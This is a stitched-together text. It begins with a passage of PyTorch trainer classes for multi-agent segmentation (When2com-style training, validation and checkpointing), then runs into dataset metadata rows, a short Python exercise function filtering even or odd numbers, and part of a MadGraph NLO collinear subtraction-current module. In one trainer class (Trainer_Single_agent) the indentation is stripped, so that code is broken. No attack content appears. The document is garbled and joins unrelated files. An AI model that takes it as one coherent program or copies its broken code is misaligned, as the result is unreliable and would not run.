                            print('Validation who2com accuracy:{}'.format(who2com_acc))
                            self.writer.add_scalar("val_metrics/when_com_accuacy", when2com_acc, i)
                            self.writer.add_scalar("val_metrics/who_com_accuracy", who2com_acc, i)
                        self.writer.add_scalar("loss/val_loss", val_loss_meter.avg, i)
                        self.logger.info("Iter %d Loss: %.4f" % (i, val_loss_meter.avg))
                        print('Normal')
                        score, class_iou = self.running_metrics_val.get_only_normal_scores()
                        self.running_metrics_val.print_score(self.n_classes, score, class_iou)
                        print('Noise')
                        score, class_iou = self.running_metrics_val.get_only_noise_scores()
                        self.running_metrics_val.print_score(self.n_classes, score, class_iou)
                        print("Overall")
                        score, class_iou = self.running_metrics_val.get_scores()
                        self.running_metrics_val.print_score(self.n_classes, score, class_iou)
                        val_loss_meter.reset()
                        self.running_metrics_val.reset()
                        # store the best model
                        if score["Mean IoU : \t"] >= best_iou:
                            best_iou = score["Mean IoU : \t"]
                            state = {
                                "epoch": i,
                                "model_state": self.model.state_dict(),
                                "optimizer_state": self.optimizer.state_dict(),
                                "scheduler_state": self.scheduler.state_dict(),
                                "best_iou": best_iou,
                            }
                            save_path = os.path.join(
                                self.writer.file_writer.get_logdir(),
                                "{}_{}_best_model.pkl".format(self.cfg["model"]["arch"], self.cfg["data"]["dataset"]),
                            )
                            torch.save(state, save_path)
                if i == self.cfg["training"]["train_iters"]:
                    flag = False
                    break
        return save_path

    def load_weight(self, model_path):
        """Load model weights (non-strict) from a saved checkpoint file."""
        state = convert_state_dict(torch.load(model_path)["model_state"])
        self.model.load_state_dict(state, strict=False)

    def evaluate(self, testloader, inference_mode='activated'): # "val_split"
        """Evaluate on ``testloader``; print bandwidth, selection accuracies
        and Normal/Noise/Overall scores.

        Returns:
            ``(score, class_iou)`` of the overall split.
        """
        running_metrics = runningScore(self.n_classes)
        # Setup Model
        self.model.eval()
        self.model.to(self.device)
        for i, data_list in enumerate(testloader):
            # Fix: use the 'None' sentinel comparison as train() does; the
            # sentinel string is truthy so a bare `if` took the wrong branch.
            if self.if_commun_label != 'None':
                images_list, labels_list, commun_label = data_list
                commun_label = commun_label.to(self.device)
            else:
                images_list, labels_list = data_list
            # multi-view inputs
            images = torch.cat(tuple(images_list), dim=1)
            # multiple output
            if self.MO_flag:
                labels = torch.cat(tuple(labels_list), dim=0)
            else:  # single output
                labels = labels_list[0]
            images = images.to(self.device)
            outputs, _, action_argmax, bandW = self.model(images, training=False, MO_flag=self.MO_flag, inference=inference_mode)
            pred = outputs.data.max(1)[1].cpu().numpy()
            gt = labels.numpy()
            # measurement results
            running_metrics.update(gt, pred)
            running_metrics.update_bandW(bandW)
            if self.if_commun_label != 'None':
                running_metrics.update_div(self.if_commun_label, gt, pred, commun_label)
                running_metrics.update_selection(self.if_commun_label, commun_label, action_argmax)
        if self.if_commun_label != 'None':
            when2com_acc, who2com_acc = running_metrics.get_selection_accuracy()
            print('Validation when2com accuracy:{}'.format(when2com_acc))
            print('Validation who2com accuracy:{}'.format(who2com_acc))
        avg_bandW = running_metrics.get_avg_bandW()
        print('Bandwidth: ' + str(avg_bandW))
        print('Normal')
        score, class_iou = running_metrics.get_only_normal_scores()
        running_metrics.print_score(self.n_classes, score, class_iou)
        print('Noise')
        score, class_iou = running_metrics.get_only_noise_scores()
        running_metrics.print_score(self.n_classes, score, class_iou)
        print("Overall")
        score, class_iou = running_metrics.get_scores()
        running_metrics.print_score(self.n_classes, score, class_iou)
        return score, class_iou
class Trainer_MIMO_All_agents(object):
    """Trainer for the all-agents (fully connected) MIMO baseline.

    The model consumes all views concatenated along the channel dimension and
    returns either ``outputs`` or ``(outputs, rand_action)`` depending on
    ``cfg['model']['shuffle_features']``. Handles training, periodic
    validation, best-mean-IoU checkpointing and standalone evaluation.
    """

    def __init__(self, cfg, writer, logger, model, loss_fn, trainloader, valloader, optimizer, scheduler, device):
        self.cfg = cfg
        self.writer = writer
        self.logger = logger
        self.model = model
        self.trainloader = trainloader
        self.valloader = valloader
        self.optimizer = optimizer
        self.scheduler = scheduler
        self.n_classes = 11  # number of segmentation classes (fixed for this dataset)
        self.loss_fn = loss_fn
        self.running_metrics_val = runningScore(self.n_classes)
        self.device = device
        self.MO_flag = self.cfg['model']['multiple_output']
        # Some datasets have no labels for communication; the sentinel is the
        # *string* 'None' and is tested with `!= 'None'` throughout.
        if 'commun_label' in self.cfg["data"]:
            self.if_commun_label = self.cfg["data"]['commun_label']
        else:
            self.if_commun_label = 'None'

    def train(self):
        """Train until ``cfg['training']['train_iters']`` iterations.

        Returns:
            Path of the checkpoint achieving the best validation mean IoU.
        """
        print('MIMO_All_Agent_Trainer')
        start_iter = 0
        if self.cfg["training"]["resume"] is not None:
            if os.path.isfile(self.cfg["training"]["resume"]):
                self.logger.info(
                    "Loading model and optimizer from checkpoint '{}'".format(self.cfg["training"]["resume"])
                )
                checkpoint = torch.load(self.cfg["training"]["resume"])
                self.model.load_state_dict(checkpoint["model_state"])
                self.optimizer.load_state_dict(checkpoint["optimizer_state"])
                self.scheduler.load_state_dict(checkpoint["scheduler_state"])
                start_iter = checkpoint["epoch"]
                self.logger.info(
                    "Loaded checkpoint '{}' (iter {})".format(
                        self.cfg["training"]["resume"], checkpoint["epoch"]
                    )
                )
            else:
                self.logger.info("No checkpoint found at '{}'".format(self.cfg["training"]["resume"]))
        val_loss_meter = averageMeter()
        time_meter = averageMeter()
        best_iou = -100.0
        i = start_iter
        flag = True
        while i <= self.cfg["training"]["train_iters"] and flag:
            for data_list in self.trainloader:
                if self.if_commun_label != 'None':
                    images_list, labels_list, commun_label = data_list
                else:
                    images_list, labels_list = data_list
                # Single-output default: first view's labels. (Removed two
                # no-op statements that copied images_list[0] back and forth.)
                labels = labels_list[0]
                images = torch.cat(tuple(images_list), dim=1)
                if self.cfg['model']['multiple_output']:
                    labels = torch.cat(tuple(labels_list), dim=0)
                i += 1
                start_ts = time.time()
                self.scheduler.step()
                self.model.train()  # matters for batchnorm/dropout
                images = images.to(self.device)
                labels = labels.to(self.device)
                self.optimizer.zero_grad()
                if self.cfg['model']['shuffle_features'] == 'selection':
                    outputs, rand_action = self.model(images)
                else:
                    outputs = self.model(images)
                loss = self.loss_fn(input=outputs, target=labels)
                loss.backward()
                self.optimizer.step()
                time_meter.update(time.time() - start_ts)
                # Process display on screen
                if i % self.cfg["training"]["print_interval"] == 0:
                    fmt_str = "Iter [{:d}/{:d}] Loss: {:.4f} Time/Image: {:.4f}"
                    print_str = fmt_str.format(
                        i,
                        self.cfg["training"]["train_iters"],
                        loss.item(),
                        time_meter.avg / self.cfg["training"]["batch_size"],
                    )
                    print(print_str)
                    self.logger.info(print_str)
                    self.writer.add_scalar("loss/train_loss", loss.item(), i)
                    time_meter.reset()
                # Validation
                if i % self.cfg["training"]["val_interval"] == 0 or i == self.cfg["training"]["train_iters"]:
                    self.model.eval()
                    with torch.no_grad():
                        for i_val, (data_list) in tqdm(enumerate(self.valloader), ncols=20,
                                                       desc='Validation'):
                            if self.if_commun_label != 'None':
                                images_val_list, labels_val_list, commun_label = data_list
                            else:
                                images_val_list, labels_val_list = data_list
                            images_val = torch.cat(tuple(images_val_list), dim=1)
                            labels_val = labels_val_list[0]
                            if self.cfg['model']['multiple_output']:  # mimo single
                                labels_val = torch.cat(tuple(labels_val_list), dim=0)
                            images_val = images_val.to(self.device)
                            labels_val = labels_val.to(self.device)
                            if self.cfg['model']['shuffle_features'] == 'selection':
                                outputs, rand_action = self.model(images_val)
                            else:
                                outputs = self.model(images_val)
                            val_loss = self.loss_fn(input=outputs, target=labels_val)
                            pred = outputs.data.max(1)[1].cpu().numpy()
                            gt = labels_val.data.cpu().numpy()
                            self.running_metrics_val.update(gt, pred)
                            val_loss_meter.update(val_loss.item())
                    self.writer.add_scalar("loss/val_loss", val_loss_meter.avg, i)
                    self.logger.info("Iter %d Loss: %.4f" % (i, val_loss_meter.avg))
                    score, class_iou = self.running_metrics_val.get_scores()
                    for k, v in score.items():
                        print(k, v)
                        self.logger.info("{}: {}".format(k, v))
                        self.writer.add_scalar("val_metrics/{}".format(k), v, i)
                    for k, v in class_iou.items():
                        self.logger.info("{}: {}".format(k, v))
                        self.writer.add_scalar("val_metrics/cls_{}".format(k), v, i)
                    val_loss_meter.reset()
                    self.running_metrics_val.reset()
                    # keep the checkpoint with the best mean IoU
                    if score["Mean IoU : \t"] >= best_iou:
                        best_iou = score["Mean IoU : \t"]
                        state = {
                            "epoch": i,
                            "model_state": self.model.state_dict(),
                            "optimizer_state": self.optimizer.state_dict(),
                            "scheduler_state": self.scheduler.state_dict(),
                            "best_iou": best_iou,
                        }
                        save_path = os.path.join(
                            self.writer.file_writer.get_logdir(),
                            "{}_{}_best_model.pkl".format(self.cfg["model"]["arch"], self.cfg["data"]["dataset"]),
                        )
                        torch.save(state, save_path)
                if i == self.cfg["training"]["train_iters"]:
                    flag = False
                    break
        return save_path

    def load_weight(self, model_path):
        """Load model weights (non-strict) from a saved checkpoint file."""
        state = convert_state_dict(torch.load(model_path)["model_state"])
        self.model.load_state_dict(state, strict=False)

    def evaluate(self, testloader): # "val_split"
        """Evaluate on ``testloader``; print Normal/Noise/Overall scores.

        Returns:
            ``(score, class_iou)`` of the overall split.
        """
        running_metrics = runningScore(self.n_classes)
        # Setup Model
        self.model.eval()
        self.model.to(self.device)
        for i, data_list in enumerate(testloader):
            # Fix: use the 'None' sentinel comparison as train() does; the
            # sentinel string is truthy so a bare `if` took the wrong branch.
            if self.if_commun_label != 'None':
                images_list, labels_list, commun_label = data_list
                commun_label = commun_label.to(self.device)
            else:
                images_list, labels_list = data_list
            # multi-view inputs
            images = torch.cat(tuple(images_list), dim=1)
            # multi-view output
            if self.MO_flag:
                labels = torch.cat(tuple(labels_list), dim=0)
            else:  # single output
                labels = labels_list[0]
            images = images.to(self.device)
            # MODEL INFERENCE
            if self.cfg['model']['shuffle_features'] == 'selection':
                outputs, action_argmax = self.model(images)
            else:
                outputs = self.model(images)
            pred = outputs.data.max(1)[1].cpu().numpy()
            gt = labels.numpy()
            # measurement results
            running_metrics.update(gt, pred)
            if self.if_commun_label != 'None':
                running_metrics.update_div(self.if_commun_label, gt, pred, commun_label)
        print('Normal')
        score, class_iou = running_metrics.get_only_normal_scores()
        running_metrics.print_score(self.n_classes, score, class_iou)
        print('Noise')
        score, class_iou = running_metrics.get_only_noise_scores()
        running_metrics.print_score(self.n_classes, score, class_iou)
        print("Overall")
        score, class_iou = running_metrics.get_scores()
        running_metrics.print_score(self.n_classes, score, class_iou)
        return score, class_iou
class Trainer_Single_agent(object):
def __init__(self, cfg, writer, logger, model, loss_fn, trainloader, valloader, optimizer, scheduler, device):
self.cfg = cfg
self.writer = writer
self.logger = logger
self.model = model
self.trainloader = trainloader
self.valloader = valloader
self.optimizer = optimizer
self.scheduler = scheduler
self.n_classes = 11
self.loss_fn = loss_fn
self.running_metrics_val = runningScore(self.n_classes)
self.device = device
self.MO_flag = self.cfg['model']['multiple_output']
def train(self):
print('Training')
start_iter = 0
if self.cfg["training"]["resume"] is not None:
if os.path.isfile(self.cfg["training"]["resume"]):
self.logger.info(
"Loading model and optimizer from checkpoint '{}'".format(self.cfg["training"]["resume"])
)
checkpoint = torch.load(self.cfg["training"]["resume"])
self.model.load_state_dict(checkpoint["model_state"])
self.optimizer.load_state_dict(checkpoint["optimizer_state"])
self.scheduler.load_state_dict(checkpoint["scheduler_state"])
start_iter = checkpoint["epoch"]
self.logger.info(
"Loaded checkpoint '{}' (iter {})".format(
self.cfg["training"]["resume"], checkpoint["epoch"]
)
)
else:
self.logger.info("No checkpoint found at '{}'".format(self.cfg["training"]["resume"]))
val_loss_meter = averageMeter()
time_meter = averageMeter()
best_iou = -100.0
i = start_iter
flag = True
while i <= self.cfg["training"]["train_iters"] and flag:
for data_list in self.trainloader:
images_list, labels_list = data_list
# only first image
images = images_list[0]
labels = labels_list[0]
if self.cfg['model']['multiple_output']: # mimo single
labels = torch.cat(tuple(labels_list), dim=0)
images = torch.cat(tuple(images_list), dim=0)
i += 1
start_ts = time.time()
self.scheduler.step()
self.model.train() # matters for batchnorm/dropout
images = images.to(self.device)
labels = labels.to(self.device)
self.optimizer.zero_grad()
outputs = self.model(images)
loss = self.loss_fn(input=outputs, target=labels)
loss.backward()
self.optimizer.step()
time_meter.update(time.time() - start_ts)
# Process display on screen
if i % self.cfg["training"]["print_interval"] == 0:
fmt_str = "Iter [{:d}/{:d}] Loss: {:.4f} Time/Image: {:.4f}"
print_str = fmt_str.format(
i,
self.cfg["training"]["train_iters"],
loss.item(),
time_meter.avg / self.cfg["training"]["batch_size"],
)
print(print_str)
self.logger.info(print_str)
self.writer.add_scalar("loss/train_loss", loss.item(), i)
time_meter.reset()
# Validation
if i % self.cfg["training"]["val_interval"] == 0 or i == self.cfg["training"]["train_iters"]:
self.model.eval()
with torch.no_grad():
for i_val, (images_val_list, labels_val_list) in tqdm(enumerate(self.valloader), ncols=20,
desc='Validation'):
images_val = images_val_list[0]
labels_val = labels_val_list[0]
if self.cfg['model']['multiple_output']: # mimo single
labels_val = torch.cat(tuple(labels_val_list), dim=0)
if self.cfg["model"]["arch"] == 'Single_agent':
images_val = torch.cat(tuple(images_val_list), dim=0)
images_val = images_val.to(self.device)
labels_val = labels_val.to(self.device)
outputs = self.model(images_val)
val_loss = self.loss_fn(input=outputs, target=labels_val)
pred = outputs.data.max(1)[1].cpu().numpy()
gt = labels_val.data.cpu().numpy()
self.running_metrics_val.update(gt, pred)
val_loss_meter.update(val_loss.item())
self.writer.add_scalar("loss/val_loss", val_loss_meter.avg, i)
self.logger.info("Iter %d Loss: %.4f" % (i, val_loss_meter.avg))
score, class_iou = self.running_metrics_val.get_scores()
for k, v in score.items():
print(k, v)
self.logger.info("{}: {}".format(k, v))
self.writer.add_scalar("val_metrics/{}".format(k), v, i)
for k, v in class_iou.items():
self.logger.info("{}: {}".format(k, v))
self.writer.add_scalar("val_metrics/cls_{}".format(k), v, i)
val_loss_meter.reset()
self.running_metrics_val.reset()
if score["Mean IoU : \t"] >= best_iou:
best_iou = score["Mean IoU : \t"]
state = {
"epoch": i,
"model_state": self.model.state_dict(),
"optimizer_state": self.optimizer.state_dict(),
"scheduler_state": self.scheduler.state_dict(),
"best_iou": best_iou,
}
save_path = os.path.join(
self.writer.file_writer.get_logdir(),
"{}_{}_best_model.pkl".format(self.cfg["model"]["arch"], self.cfg["data"]["dataset"]),
)
torch.save(state, save_path)
if i == self.cfg["training"]["train_iters"]:
flag = False
break
return save_path
def load_weight(self, model_path):
    """Restore model weights from a saved checkpoint (non-strict load)."""
    checkpoint = torch.load(model_path)
    weights = convert_state_dict(checkpoint["model_state"])
    self.model.load_state_dict(weights, strict=False)
def evaluate(self, testloader):
    """Run evaluation over `testloader` and print/return the overall scores."""
    # Fresh local metric accumulator for this evaluation pass.
    metrics = runningScore(self.n_classes)
    # Put the model in inference mode on the target device.
    self.model.eval()
    self.model.to(self.device)
    for batch_idx, (images_list, labels_list) in enumerate(testloader):
        # Stack the multi-view inputs along the batch dimension.
        batch_images = torch.cat(tuple(images_list), dim=0)
        if self.cfg['model']['multiple_output']:
            # One label map per view: stack them to match the stacked inputs.
            batch_labels = torch.cat(tuple(labels_list), dim=0)
        else:
            # Single-output model: only the first view's labels are scored.
            batch_labels = labels_list[0]
        batch_images = batch_images.to(self.device)
        model_out = self.model(batch_images)
        predictions = model_out.data.max(1)[1].cpu().numpy()
        ground_truth = batch_labels.numpy()
        metrics.update(ground_truth, predictions)
    print("Overall")
    score, class_iou = metrics.get_scores()
    metrics.print_score(self.n_classes, score, class_iou)
    return score, class_iou
class Trainer_All_agents(object):
    """Trainer for the all-agents setting.

    Every agent's view is concatenated along the channel dimension (dim=1)
    and processed by a single model.  Supports optional communication labels
    (``cfg['data']['commun_label']``; disabled by the sentinel string
    ``'None'``) and the ``'selection'`` feature-shuffling mode, in which the
    model returns ``(outputs, rand_action)`` instead of plain outputs.
    """

    def __init__(self, cfg, writer, logger, model, loss_fn, trainloader, valloader, optimizer, scheduler, device):
        self.cfg = cfg
        self.writer = writer
        self.logger = logger
        self.model = model
        self.trainloader = trainloader
        self.valloader = valloader
        self.optimizer = optimizer
        self.scheduler = scheduler
        # Number of semantic classes scored by the running metrics.
        self.n_classes = 11
        self.loss_fn = loss_fn
        self.running_metrics_val = runningScore(self.n_classes)
        self.device = device
        # Whether the model emits one output per agent (multiple output).
        self.MO_flag = self.cfg['model']['multiple_output']
        # Communication labels are disabled by the sentinel STRING 'None'
        # (not the None object) — comparisons must use != 'None'.
        if 'commun_label' in self.cfg["data"]:
            self.if_commun_label = cfg["data"]['commun_label']
        else:
            self.if_commun_label = 'None'

    def train(self):
        """Run the training loop, validating every ``val_interval`` iterations.

        Returns:
            Path of the checkpoint with the best mean IoU seen so far.
        """
        print('Training')
        start_iter = 0
        # Optionally resume model/optimizer/scheduler from a checkpoint.
        if self.cfg["training"]["resume"] is not None:
            if os.path.isfile(self.cfg["training"]["resume"]):
                self.logger.info(
                    "Loading model and optimizer from checkpoint '{}'".format(self.cfg["training"]["resume"])
                )
                checkpoint = torch.load(self.cfg["training"]["resume"])
                self.model.load_state_dict(checkpoint["model_state"])
                self.optimizer.load_state_dict(checkpoint["optimizer_state"])
                self.scheduler.load_state_dict(checkpoint["scheduler_state"])
                start_iter = checkpoint["epoch"]
                self.logger.info(
                    "Loaded checkpoint '{}' (iter {})".format(
                        self.cfg["training"]["resume"], checkpoint["epoch"]
                    )
                )
            else:
                self.logger.info("No checkpoint found at '{}'".format(self.cfg["training"]["resume"]))
        val_loss_meter = averageMeter()
        time_meter = averageMeter()
        best_iou = -100.0
        i = start_iter
        flag = True
        save_path = None  # defined once the first validation checkpoint is saved
        while i <= self.cfg["training"]["train_iters"] and flag:
            for data_list in self.trainloader:
                if self.if_commun_label != 'None':
                    images_list, labels_list, commun_label = data_list
                else:
                    images_list, labels_list = data_list
                # Concatenate all agents' views along the channel dimension.
                images = torch.cat(tuple(images_list), dim=1)
                labels = labels_list[0]
                if self.cfg['model']['multiple_output']:  # one label map per agent
                    labels = torch.cat(tuple(labels_list), dim=0)
                i += 1
                start_ts = time.time()
                self.scheduler.step()
                self.model.train()
                images = images.to(self.device)
                labels = labels.to(self.device)
                self.optimizer.zero_grad()
                if self.cfg['model']['shuffle_features'] == 'selection':  # random selection
                    outputs, rand_action = self.model(images)
                else:  # concatenate all features
                    outputs = self.model(images)
                loss = self.loss_fn(input=outputs, target=labels)
                loss.backward()
                self.optimizer.step()
                time_meter.update(time.time() - start_ts)
                # Progress display on screen / logger / tensorboard.
                if i % self.cfg["training"]["print_interval"] == 0:
                    fmt_str = "Iter [{:d}/{:d}] Loss: {:.4f} Time/Image: {:.4f}"
                    print_str = fmt_str.format(
                        i,
                        self.cfg["training"]["train_iters"],
                        loss.item(),
                        time_meter.avg / self.cfg["training"]["batch_size"],
                    )
                    print(print_str)
                    self.logger.info(print_str)
                    self.writer.add_scalar("loss/train_loss", loss.item(), i)
                    time_meter.reset()
                # Validation
                if i % self.cfg["training"]["val_interval"] == 0 or i == self.cfg["training"]["train_iters"]:
                    self.model.eval()
                    with torch.no_grad():
                        for i_val, data_val_list in tqdm(enumerate(self.valloader), ncols=20,
                                                         desc='Validation'):
                            # BUG FIX: unpack the validation batch itself;
                            # previously the stale TRAINING batch `data_list`
                            # was unpacked here, so validation repeatedly
                            # scored one training batch.
                            if self.if_commun_label != 'None':
                                images_val_list, labels_val_list, commun_label = data_val_list
                            else:
                                images_val_list, labels_val_list = data_val_list
                            images_val = torch.cat(tuple(images_val_list), dim=1)
                            labels_val = labels_val_list[0]
                            if self.cfg['model']['multiple_output']:
                                labels_val = torch.cat(tuple(labels_val_list), dim=0)
                            images_val = images_val.to(self.device)
                            labels_val = labels_val.to(self.device)
                            if self.cfg['model']['shuffle_features'] == 'selection':
                                outputs, rand_action = self.model(images_val)
                            else:
                                outputs = self.model(images_val)
                            val_loss = self.loss_fn(input=outputs, target=labels_val)
                            pred = outputs.data.max(1)[1].cpu().numpy()
                            gt = labels_val.data.cpu().numpy()
                            self.running_metrics_val.update(gt, pred)
                            val_loss_meter.update(val_loss.item())
                    self.writer.add_scalar("loss/val_loss", val_loss_meter.avg, i)
                    self.logger.info("Iter %d Loss: %.4f" % (i, val_loss_meter.avg))
                    score, class_iou = self.running_metrics_val.get_scores()
                    for k, v in score.items():
                        print(k, v)
                        self.logger.info("{}: {}".format(k, v))
                        self.writer.add_scalar("val_metrics/{}".format(k), v, i)
                    for k, v in class_iou.items():
                        self.logger.info("{}: {}".format(k, v))
                        self.writer.add_scalar("val_metrics/cls_{}".format(k), v, i)
                    val_loss_meter.reset()
                    self.running_metrics_val.reset()
                    # Checkpoint whenever the mean IoU matches or beats the best.
                    if score["Mean IoU : \t"] >= best_iou:
                        best_iou = score["Mean IoU : \t"]
                        state = {
                            "epoch": i,
                            "model_state": self.model.state_dict(),
                            "optimizer_state": self.optimizer.state_dict(),
                            "scheduler_state": self.scheduler.state_dict(),
                            "best_iou": best_iou,
                        }
                        save_path = os.path.join(
                            self.writer.file_writer.get_logdir(),
                            "{}_{}_best_model.pkl".format(self.cfg["model"]["arch"], self.cfg["data"]["dataset"]),
                        )
                        torch.save(state, save_path)
                if i == self.cfg["training"]["train_iters"]:
                    flag = False
                    break
        return save_path

    def load_weight(self, model_path):
        """Restore model weights from a checkpoint file (non-strict load)."""
        state = convert_state_dict(torch.load(model_path)["model_state"])
        self.model.load_state_dict(state, strict=False)

    def evaluate(self, testloader):
        """Evaluate on `testloader`.

        When communication labels are enabled, additionally reports the
        'Normal' and 'Noise' sub-scores; always reports and returns the
        overall (score, class_iou).
        """
        running_metrics = runningScore(self.n_classes)
        # Setup Model
        self.model.eval()
        self.model.to(self.device)
        for i, data_list in enumerate(testloader):
            # BUG FIX: the disabled sentinel is the truthy STRING 'None', so
            # the original `if self.if_commun_label:` always took the 3-tuple
            # branch; compare against the sentinel explicitly.
            if self.if_commun_label != 'None':
                images_list, labels_list, commun_label = data_list
                commun_label = commun_label.to(self.device)
            else:
                images_list, labels_list = data_list
            # multi-view inputs, concatenated along channels
            images = torch.cat(tuple(images_list), dim=1)
            # multi-view output
            if self.MO_flag:
                labels = torch.cat(tuple(labels_list), dim=0)
            else:  # single output
                labels = labels_list[0]
            images = images.to(self.device)
            if self.cfg['model']['shuffle_features'] == 'selection':
                outputs, rand_action = self.model(images)
            else:
                outputs = self.model(images)
            pred = outputs.data.max(1)[1].cpu().numpy()
            gt = labels.numpy()
            # measurement results
            running_metrics.update(gt, pred)
            if self.if_commun_label != 'None':
                running_metrics.update_div(self.if_commun_label, gt, pred, commun_label)
        # Normal/Noise splits only exist when communication labels were tracked.
        if self.if_commun_label != 'None':
            print('Normal')
            score, class_iou = running_metrics.get_only_normal_scores()
            running_metrics.print_score(self.n_classes, score, class_iou)
            print('Noise')
            score, class_iou = running_metrics.get_only_noise_scores()
            running_metrics.print_score(self.n_classes, score, class_iou)
        print("Overall")
        score, class_iou = running_metrics.get_scores()
        running_metrics.print_score(self.n_classes, score, class_iou)
        return score, class_iou
| 41.428247
| 129
| 0.520455
| 7,706
| 73,038
| 4.692447
| 0.034129
| 0.04411
| 0.036919
| 0.032909
| 0.974087
| 0.972566
| 0.971709
| 0.970326
| 0.966289
| 0.963523
| 0
| 0.006241
| 0.376941
| 73,038
| 1,762
| 130
| 41.451759
| 0.788362
| 0.033763
| 0
| 0.9274
| 0
| 0
| 0.089682
| 0.005182
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021858
| false
| 0
| 0.020297
| 0
| 0.058548
| 0.089774
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
70e0809c445d27e93089ec7bbc4649124ba6425a
| 325
|
py
|
Python
|
Python-Advanced/functions_advanced_exercise/even_or_odd.py
|
Xamaneone/SoftUni-Intro
|
985fe3249cd2adf021c2003372e840219811d989
|
[
"MIT"
] | null | null | null |
Python-Advanced/functions_advanced_exercise/even_or_odd.py
|
Xamaneone/SoftUni-Intro
|
985fe3249cd2adf021c2003372e840219811d989
|
[
"MIT"
] | null | null | null |
Python-Advanced/functions_advanced_exercise/even_or_odd.py
|
Xamaneone/SoftUni-Intro
|
985fe3249cd2adf021c2003372e840219811d989
|
[
"MIT"
] | null | null | null |
def even_odd(*args):
    """Filter the leading numbers of *args by parity.

    The trailing argument is a mode string: "even" keeps even numbers,
    anything else keeps odd numbers.  The mode string itself is excluded
    from the filtered values.
    """
    numbers = args[:-1]
    wanted_remainder = 0 if "even" in args else 1
    return [value for value in numbers if value % 2 == wanted_remainder]
| 32.5
| 90
| 0.544615
| 66
| 325
| 2.636364
| 0.409091
| 0.12069
| 0.183908
| 0.252874
| 0.770115
| 0.770115
| 0.770115
| 0.482759
| 0.482759
| 0
| 0
| 0.092
| 0.230769
| 325
| 9
| 91
| 36.111111
| 0.604
| 0.292308
| 0
| 0
| 0
| 0
| 0.017621
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0
| 0
| 0.75
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
cb06f57df731fc6db65a2e8f3bf56e18f777cdd9
| 37,554
|
py
|
Python
|
madgraph/iolibs/template_files/OLD_subtraction/cataniseymour/NLO/local_currents.py
|
madnklo/madnklo
|
646a3db9c8efd7b4cb00e9d89b9197cd5394c01b
|
[
"NCSA"
] | 1
|
2019-12-14T15:25:38.000Z
|
2019-12-14T15:25:38.000Z
|
madgraph/iolibs/template_files/OLD_subtraction/cataniseymour/NLO/local_currents.py
|
madnklo/madnklo
|
646a3db9c8efd7b4cb00e9d89b9197cd5394c01b
|
[
"NCSA"
] | 26
|
2018-10-08T15:49:32.000Z
|
2020-05-15T13:33:36.000Z
|
madgraph/iolibs/template_files/OLD_subtraction/cataniseymour/NLO/local_currents.py
|
madnklo/madnklo
|
646a3db9c8efd7b4cb00e9d89b9197cd5394c01b
|
[
"NCSA"
] | 2
|
2019-03-25T17:28:48.000Z
|
2021-04-21T12:15:53.000Z
|
##########################################################################################
#
# Copyright (c) 2009 The MadGraph5_aMC@NLO Development team and Contributors
#
# This file is a part of the MadGraph5_aMC@NLO project, an application which
# automatically generates Feynman diagrams and matrix elements for arbitrary
# high-energy processes in the Standard Model and beyond.
#
# It is subject to the MadGraph5_aMC@NLO license which should accompany this
# distribution.
#
# For more information, visit madgraph.phys.ucl.ac.be and amcatnlo.web.cern.ch
#
##########################################################################################
"""Implementation of NLO colorful currents."""
import os
import math
import commons.utils as utils
import commons.QCD_local_currents as currents
pjoin = os.path.join
CurrentImplementationError = utils.CurrentImplementationError
#=========================================================================================
# Eikonal factor, modified by partial fractioning and without divergence
#=========================================================================================
def mod_eikonal(pi, pj, pr):
    """Return the modified eikonal factor for a soft particle of momentum pr
    emitted from the dipole with momenta pi and pj.

    Starting from the plain eikonal, the factor 1 / sir is dropped (it is
    already part of the normalisation factor) and the result is multiplied
    by the partial fraction sjr / (sir + sjr) to regulate sjr -> 0.
    """
    return 2 * pi.dot(pj) / pr.dot(pi + pj)
#=========================================================================================
# NLO final-collinear currents, containing the soft limits
#=========================================================================================
class QCD_final_collinear_0_qqx(currents.QCDLocalCollinearCurrent):
    """q q~ collinear tree-level current."""

    @classmethod
    def does_implement_this_current(cls, current, model):
        """Return the initialization variables if `current` is a final-state,
        massless quark/anti-quark collinear structure; otherwise None."""
        # Check the general properties common to NLO QCD collinear tree-level currents
        init_vars = cls.common_does_implement_this_current(current, 2, 0)
        if init_vars is None: return None
        # Retrieve singular structure
        ss = current.get('singular_structure')
        # Check that the particles are a massless quark and its anti-quark in final-state
        if len(ss.legs) != 2: return None
        for leg in ss.legs:
            if not cls.is_quark(leg, model): return None
            if not cls.is_massless(leg, model): return None
            if cls.is_initial(leg): return None
        if not cls.are_antiparticles(ss.legs[0], ss.legs[1]): return None
        # The current is valid
        return init_vars

    @classmethod
    def get_sorted_children(cls, current, model):
        """Return the children leg numbers in singular-structure order."""
        legs = current.get('singular_structure').legs
        return tuple(leg.n for leg in legs)

    def evaluate_kernel(self, zs, kTs, parent):
        """Evaluate the q q~ splitting kernel for collinear variables
        (zs, kTs), returning a SubtractionCurrentEvaluation with a
        spin-uncorrelated piece (0, 0) and a kT spin-correlated piece (1, 0)."""
        # Retrieve the collinear variables
        z = zs[0]
        kT = kTs[0]
        # Instantiate the structure of the result
        evaluation = utils.SubtractionCurrentEvaluation({
            'spin_correlations' : [None, ((parent, (kT, )), ), ],
            'color_correlations' : [None],
            'values' : {(0, 0): {'finite': None},
                        (1, 0): {'finite': None}, }
        })
        # The line below implements the g_{\mu\nu} part of the splitting kernel.
        # Notice that the extra longitudinal terms included in the spin-correlation 'None'
        # from the relation:
        #    \sum_\lambda \epsilon_\lambda^\mu \epsilon_\lambda^{\star\nu}
        #    = g^{\mu\nu} + longitudinal terms
        # are irrelevant because Ward identities evaluate them to zero anyway.
        # WARNING multiplied by two because of flavor factors
        evaluation['values'][(0, 0)]['finite'] = 2. * self.TR
        evaluation['values'][(1, 0)]['finite'] = 2. * 4. * self.TR * z*(1.-z) / kT.square()
        return evaluation
